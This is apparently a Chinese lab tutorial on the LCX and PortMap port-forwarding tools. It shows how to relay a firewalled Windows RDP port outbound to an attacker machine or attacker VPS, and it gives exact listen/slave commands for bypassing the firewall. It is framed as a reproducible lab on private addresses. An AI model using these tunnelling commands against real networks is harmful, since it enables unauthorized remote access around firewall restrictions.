当前位置: 首页 > article >正文

LCX端口转发

LCX介绍

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。 Windows版的LCX用法:

端口转发:
Lcx -listen <监听slave请求的端口><等待连接的端口>
Lcx -slave <攻击机IP><监听端口><目标IP><目标端口>
端口映射:
Lcx -tran<等待连接的端口><目标IP><日标端口>

Linux版的LCX用法:

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log
filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2

LCX实验一

一、实验场景

由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器的3389端口

利用前提:需要这两台机器同时拥有公网ip, 这样他俩才能互相访问,本文章复现实验的方法是将这两台机器同时配置私网IP,在同一局域网络下,模拟公网的网络环境

二、实验环境

机器介绍如下

机器名称 机器IP
攻击机器192.168.14.137
web服务器192.168.14.135

三、实验复现

环境模拟:

为了模拟实际生产环境中的安全防护措施,我们可以通过配置防火墙规则来阻断对靶机3389端口的访问请求。这样做可以有效地防止攻击机通过远程桌面服务的3389端口对靶机进行未授权访问。以下是具体的步骤:

1. 首先我们要确保远程桌面服务,也就是3389端口是开启的

控制面板>>系统与安全>>系统>>更改设置>>远程

接下来我们配置防火墙规则

控制面板>>系统与安全>>Windows防火墙>>高级设置>>入站规则

翻到最下面,找到远程桌面(TCP-in)

双击打开,阻止连接

到这里,我们环境的模拟就配置好了,接下来我们可以验证一下环境是否模拟成功

打开一台windows电脑,搜索远程桌面连接,输入靶机的IP地址,尝试连接

 如果你也是这样,说明你之前做的所有步骤都成功了,接下来可以放心大胆的做下面的步骤了

复现步骤

1、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口

切换到工具所在目录,打开powershell或cmd ,运行

.\lcx转发工具.exe  -listen 53 1111

2、在web靶机上运行以下命令, 将本地的3389端口转发到192.168.3.27的53端口

同样是切换到工具所在目录, 打开cmd或powershell,运行

.\lcx转发工具.exe -slave 192.168.14.137 53 127.0.0.1 3389

3、在攻击机器上运行远程桌面,地址为127.0.0.1:1111 

输入账号密码

点击连接

连接成功

LCX实验二

一、实验场景

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的54端口,这个时候攻击者在VPS监听54端口并且转发到1111端口,这个时候攻击者连接VPS的1111端口, 等于访问web服务器的3389端口

二、实验环境

机器名称机器IP
攻击者VPS以你实际vps的IP地址为准
内网攻击者机器192.168.14.137
内网靶机192.168.14.135

三、实验复现

1、在靶机上运行以下命令,监听本地3389端口并且转发到vps的54端口

lcx -slave 这里填写的是你vps的IP地址 54 127.0.0.1 3389

l 2、在vps运行lcx -listen 54 1111,因为我的机器vps机器是linux系统所以使用portmap

./portmap -m 2 -p1 54 -p2 1111

3、在攻击机器上连接你vps的IP地址及转发端口


http://www.kler.cn/news/360758.html

相关文章:

  • 【代码随想录——数组——二刷】
  • 一、PyCharm 基本快捷键总结
  • go生成二维码
  • OpenAi推出ChatGPT客户端
  • Vmware 17 安装OpenEuler 22.03 LTS(手把手教学)
  • IO模块引领轻工纺织智能化转型
  • Go 语言初探
  • 使用 C 或 C++ 开发 Python库(02)
  • 车辆管理系统设计与SpringBoot技术融合
  • 微前端架构的思考 :专注于多框架的并存可能并不是唯一的方向 — 探讨新前端的分层式微前端架构
  • NPOI 基础操作,创建一个 docx 并打开
  • SQL Server动态列转行
  • 如何提升游戏的用户留存率
  • linux上sed的常用操作
  • [数据采集技术:实践02]:requests,lxml,BeautifulSoup模块的使用
  • vue3--实现瀑布流-长列表-懒加载
  • 电脑视频剪辑大比拼,谁更胜一筹?
  • SaaS架构:中央库存系统架构设计
  • 蘑菇分类识别数据集(猫脸码客 第222期)
  • C++源码生成·序章